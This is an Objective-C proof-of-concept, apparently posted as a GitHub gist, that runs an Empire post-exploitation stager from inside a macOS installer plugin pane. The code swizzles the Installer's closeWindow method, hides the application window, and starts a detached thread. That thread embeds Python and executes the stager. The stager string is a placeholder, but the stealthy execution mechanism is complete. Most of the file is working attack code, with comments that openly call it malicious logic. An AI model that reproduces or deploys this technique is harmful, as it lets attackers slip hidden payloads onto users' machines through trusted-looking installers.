Empire Payload Execution w/ Installer Plugin PoC
| // | |
| // launcher.m | |
| // launcher | |
| // | |
| // Created by Chris Ross on 2/1/18. | |
| // Copyright © 2018 Void. All rights reserved. | |
| // | |
| #import "MyInstallerPane.h" | |
| #import <Python/Python.h> | |
| #import <locale.h> | |
| #import <Cocoa/Cocoa.h> | |
| #import <wchar.h> | |
| #import <string.h> | |
| #import <stdlib.h> | |
| #import <objc/runtime.h> | |
| #include <wchar.h> | |
| #include <assert.h> | |
| #include <pthread.h> | |
| void* runPayload() | |
| { | |
| //Malicious logic to execute an empire stager or load a dylib from memory here: | |
| NSString *pyCommand = @"EMPIRE PYTHON STAGER HERE"; | |
| const char *command = [pyCommand cStringUsingEncoding:NSASCIIStringEncoding]; | |
| setlocale(LC_ALL, "en_US.URF-8"); | |
| Py_Initialize(); | |
| PyRun_SimpleString(command); | |
| Py_Finalize(); | |
| return 0; | |
| } | |
| // This function will replace the closeWindow method for the InstallerSection class | |
| void __Swizzle_closeWindow(id arg1) { | |
| // Remove the main window from the screen | |
| NSApplication *currApp = [NSApplication sharedApplication]; | |
| [currApp hide:nil]; | |
| [currApp setActivationPolicy:NSApplicationActivationPolicyAccessory]; | |
| // Need to launch the payload in a background thread or else the application will halt | |
| pthread_attr_t attr; | |
| pthread_t posixThreadID; | |
| int returnVal; | |
| returnVal = pthread_attr_init(&attr); | |
| assert(!returnVal); | |
| returnVal = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED); | |
| assert(!returnVal); | |
| int threadError = pthread_create(&posixThreadID, &attr, &runPayload, NULL); | |
| } | |
| @implementation MyInstallerPane | |
| - (NSString *)title | |
| { | |
| return [[NSBundle bundleForClass:[self class]] localizedStringForKey:@"PaneTitle" value:nil table:nil]; | |
| } | |
| - (void)didEnterPane:(InstallerSectionDirection)dir { | |
| //Swizzle the method here. | |
| //https://stackoverflow.com/questions/30044366/method-swizzling-for-protocols/30044435 | |
| SEL selector = @selector(closeWindow:); | |
| IMP code = (IMP)__Swizzle_closeWindow; | |
| Protocol *proto = objc_getProtocol("InstallerSectionController"); | |
| // Get the class list | |
| int classesCount = objc_getClassList ( NULL, 0 ); | |
| Class *classes = (Class *)malloc( classesCount * sizeof(Class)); | |
| objc_getClassList( classes, classesCount ); | |
| // For every class | |
| for (int classIndex = 0; classIndex < classesCount; classIndex++) { | |
| Class cls = classes[classIndex]; | |
| Class conformingClass = cls; | |
| while (conformingClass != Nil) { | |
| if (class_conformsToProtocol(conformingClass, proto)) { | |
| break; | |
| } | |
| conformingClass = class_getSuperclass(conformingClass); | |
| } | |
| if (conformingClass != Nil) { | |
| unsigned int methodsCount; | |
| Method *methods = class_copyMethodList(cls, &methodsCount); | |
| for (int methodIndex = 0; methodIndex < methodsCount; methodIndex++) { | |
| if (selector == method_getName(methods[methodIndex])) { | |
| //swizzle | |
| IMP originalMethod = method_setImplementation(methods[methodIndex], code); | |
| } | |
| } | |
| } | |
| } | |
| } | |
| - (void) willEnterPane:(InstallerSectionDirection)dir { | |
| } | |
| - (BOOL)shouldExitPane:(InstallerSectionDirection)dir | |
| { | |
| return YES; | |
| } | |
| @end | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment